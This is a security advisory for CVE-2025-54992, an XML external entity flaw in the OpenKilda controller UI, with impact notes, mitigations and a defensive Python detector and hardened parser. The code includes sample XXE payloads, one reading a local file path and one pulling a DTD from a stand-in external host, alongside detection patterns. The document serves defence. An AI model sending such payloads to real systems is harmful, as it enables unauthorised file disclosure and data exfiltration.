CVE-2025-54992: CWE-611: Improper Restriction of XML External Entity Reference in telstra open-kilda
OpenKilda is an open-source OpenFlow controller. Prior to version 1.164.0, an XML external entity (XXE) injection vulnerability was found in OpenKilda which in combination with GHSL-2025-024 allows unauthenticated attackers to exfiltrate information from the instance where the OpenKilda UI is running. This issue may lead to Information disclosure. This issue has been patched in version 1.164.0.
AI Analysis
Technical Summary
CVE-2025-54992 is a medium-severity vulnerability affecting versions of Telstra's open-source OpenFlow controller OpenKilda prior to 1.164.0. The vulnerability is classified as CWE-611, which corresponds to Improper Restriction of XML External Entity (XXE) Reference. XXE vulnerabilities arise when XML parsers process external entity references without proper validation or restriction, allowing attackers to read arbitrary files or cause denial of service. In this case, the vulnerability allows unauthenticated attackers to exploit the OpenKilda UI instance by injecting malicious XML payloads. When combined with another vulnerability (GHSL-2025-024), this XXE flaw enables attackers to exfiltrate sensitive information from the system running the OpenKilda UI. The vulnerability does not require authentication or user interaction, and the attack vector is network-based (remote). The CVSS 4.0 base score is 6.9, reflecting a medium severity level, with the main impact being confidentiality loss due to information disclosure. The vulnerability has been patched in OpenKilda version 1.164.0. No known exploits are reported in the wild yet. OpenKilda is a software-defined networking (SDN) controller used to manage OpenFlow-enabled network devices, often deployed in large-scale network environments to optimize traffic flow and network programmability. The vulnerability could be leveraged by attackers to gain insight into network configurations, credentials, or other sensitive data, potentially facilitating further attacks or network disruptions.
Potential Impact
For European organizations deploying OpenKilda as part of their network infrastructure, this vulnerability poses a risk of unauthorized information disclosure. Since OpenKilda is used to control OpenFlow-enabled network devices, exposure of configuration data or credentials could compromise network integrity and confidentiality. Attackers could leverage this information to map network topologies, identify critical assets, or launch subsequent attacks such as lateral movement or denial of service. The fact that the vulnerability is exploitable without authentication and user interaction increases the risk, especially for organizations exposing the OpenKilda UI to untrusted networks. This could impact telecommunications providers, data centers, cloud service providers, and enterprises relying on SDN for network management. The potential impact includes loss of sensitive operational data, regulatory compliance violations (e.g., GDPR if personal data is exposed), and reputational damage. However, the vulnerability does not directly allow code execution or availability disruption, limiting the immediate operational impact to information disclosure.
Mitigation Recommendations
European organizations should promptly upgrade OpenKilda installations to version 1.164.0 or later, where the XXE vulnerability is patched. Until upgrades can be applied, organizations should implement network-level controls to restrict access to the OpenKilda UI interface, ensuring it is not exposed to untrusted or public networks. Deploying web application firewalls (WAFs) with rules to detect and block XML external entity payloads can provide temporary protection. Additionally, organizations should audit their OpenKilda configurations to ensure minimal exposure and review logs for suspicious XML parsing errors or unusual access patterns. Employing network segmentation to isolate SDN controllers from general user networks reduces attack surface. Regular vulnerability scanning and penetration testing focused on SDN components can help detect similar issues proactively. Finally, monitoring for updates on GHSL-2025-024 and related vulnerabilities is recommended to maintain comprehensive protection.
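The XXE mechanism in the Technical Summary and the detection and hardening controls listed above (WAF rules for external entity payloads, a parser that refuses to resolve them) in one added Python example. It is illustrative code written for this page, not OpenKilda's own code (which is Java) or the project's fix; the sample request bodies are constructed and the external identifiers in them are placeholders.

```python
import io
import re
import xml.sax
from xml.sax.handler import feature_external_ges, feature_external_pes

# Byte patterns a WAF rule or log-review pass can key on: any DTD, external
# (SYSTEM/PUBLIC) entity declarations, and "%" parameter entities (out-of-band XXE).
_DOCTYPE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
_EXTERNAL_ENTITY = re.compile(
    rb"<!ENTITY\s+%?\s*[^\s>]+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
_PARAMETER_ENTITY = re.compile(rb"<!ENTITY\s+%", re.IGNORECASE)

def xxe_indicators(body: bytes) -> list:
    """Return the XXE indicators present in a raw XML request body."""
    found = []
    if _DOCTYPE.search(body):
        found.append("doctype")
    if _EXTERNAL_ENTITY.search(body):
        found.append("external-entity")
    if _PARAMETER_ENTITY.search(body):
        found.append("parameter-entity")
    return found

class _TextCollector(xml.sax.ContentHandler):
    def __init__(self):
        super().__init__()
        self.chunks = []
    def characters(self, content):
        self.chunks.append(content)

def parse_untrusted_xml(body: bytes) -> str:
    """Parse client-supplied XML with external entities disabled. Any DOCTYPE
    is rejected up front: without a DTD no entity can be declared at all."""
    if _DOCTYPE.search(body):
        raise ValueError("DTD not allowed in untrusted XML")
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)  # external general entities
    parser.setFeature(feature_external_pes, False)  # external parameter entities
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(body))
    return "".join(handler.chunks)

# Constructed sample bodies (not captured traffic); identifiers are placeholders.
SAMPLE_BODIES = {
    "benign": b'<?xml version="1.0"?><note><to>Alice</to></note>',
    "inband": b'<!DOCTYPE n [<!ENTITY e SYSTEM "file:///placeholder/path">]><n>&e;</n>',
    "oob": b'<!DOCTYPE n [<!ENTITY % p SYSTEM "http://example.invalid/x.dtd"> %p;]><n/>',
}
```

Rejecting the DOCTYPE is the broad control; the two feature flags are defence in depth for a parser that must accept DTDs for other reasons.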
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland
Technical Details
- Data Version: 5.1
- Assigner Short Name: GitHub_M
- Date Reserved: 2025-08-04T17:34:24.420Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 689a6502ad5a09ad00294e98
Added to database: 8/11/2025, 9:47:46 PM
Last enriched: 8/19/2025, 1:44:08 AM
Last updated: 9/23/2025, 10:40:02 PM